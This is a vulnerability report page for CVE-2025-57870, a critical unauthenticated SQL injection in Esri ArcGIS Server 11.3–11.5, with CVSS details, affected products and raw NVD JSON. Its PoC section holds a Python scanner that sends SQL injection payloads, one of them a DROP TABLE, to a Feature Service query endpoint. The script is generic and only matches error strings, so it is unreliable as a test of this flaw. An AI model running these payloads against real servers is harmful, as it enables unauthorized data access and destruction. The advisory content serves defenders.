Security Vulnerability Report
中文
CVE-2025-57870 CVSS 10.0 CRITICAL

CVE-2025-57870

Published: 2025-10-22 15:15:52
Last Modified: 2025-10-31 18:51:23
Source: [email protected]

Description

A SQL Injection vulnerability exists in Esri ArcGIS Server versions 11.3, 11.4 and 11.5 on Windows, Linux and Kubernetes. This vulnerability allows a remote, unauthenticated attacker to execute arbitrary SQL commands via a specific ArcGIS Feature Service operation. Successful exploitation can potentially result in unauthorized access, modification, or deletion of data from the underlying Enterprise Geodatabase.

CVSS Details

CVSS Score
10.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:esri:arcgis_server:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:kubernetes:kubernetes:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Esri ArcGIS Server 11.3 (Windows/Linux/Kubernetes)
Esri ArcGIS Server 11.4 (Windows/Linux/Kubernetes)
Esri ArcGIS Server 11.5 (Windows/Linux/Kubernetes)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-57870 PoC - SQL Injection in Esri ArcGIS Server Feature Service # Target: ArcGIS Server versions 11.3, 11.4, 11.5 # Note: For authorized security testing only def test_sqli(target_url, service_endpoint): """Test for SQL injection vulnerability in ArcGIS Feature Service""" # Normal request for baseline normal_params = { 'where': '1=1', 'outFields': '*', 'f': 'json' } # SQL injection payloads payloads = [ "1' OR '1'='1", "1' UNION SELECT NULL--", "1'; DROP TABLE--", "1' AND 1=1--" ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Content-Type': 'application/x-www-form-urlencoded' } print(f"[*] Testing target: {target_url}") print(f"[*] Service endpoint: {service_endpoint}") # Test normal request try: response = requests.get( f"{target_url}/{service_endpoint}/query", params=normal_params, headers=headers, timeout=30 ) print(f"[+] Normal request status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False # Test SQL injection payloads for payload in payloads: sqli_params = { 'where': payload, 'outFields': '*', 'f': 'json' } try: response = requests.get( f"{target_url}/{service_endpoint}/query", params=sqli_params, headers=headers, timeout=30 ) # Check for SQL error indicators if 'sql' in response.text.lower() or 'error' in response.text.lower(): print(f"[!] Potential SQL injection detected with payload: {payload}") print(f"[!] Response preview: {response.text[:200]}") return True except requests.exceptions.RequestException as e: print(f"[-] Error testing payload {payload}: {e}") print("[*] No obvious SQL injection detected") return False if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2025-57870-poc.py <target_url> <service_endpoint>") print("Example: python cve-2025-57870-poc.py https://arcgis.example.com/arcgis rest/services/Example/FeatureServer/0") sys.exit(1) target = sys.argv[1] endpoint = sys.argv[2] test_sqli(target, endpoint)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-57870", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:51.830", "lastModified": "2025-10-31T18:51:22.923", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A SQL Injection vulnerability exists in Esri ArcGIS Server versions 11.3, 11.4 and 11.5 on Windows, Linux and Kubernetes. This vulnerability allows a remote, unauthenticated attacker to execute arbitrary SQL commands via a specific ArcGIS Feature Service operation. Successful exploitation can potentially result in unauthorized access, modification, or deletion of data from the underlying Enterprise Geodatabase."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:esri:arcgis_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.3", "versionEndIncluding": "11.5", "matchCriteriaId": "B19FFADD-9CAD-438D-95BB-AA1C65EC2207"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:a:kubernetes:kubernetes:-:*:*:*:*:*:*:*", "matchCriteriaId": "14C32308-314D-4E0D-B15F-6A68DF21E9F9"}, {"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/arcgis-server-feature-services-security-patch", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.